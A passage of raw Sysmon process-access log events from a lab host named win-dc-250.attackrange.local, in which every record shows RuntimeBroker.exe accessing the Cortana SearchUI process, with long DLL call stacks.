indows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165992C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165992C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\W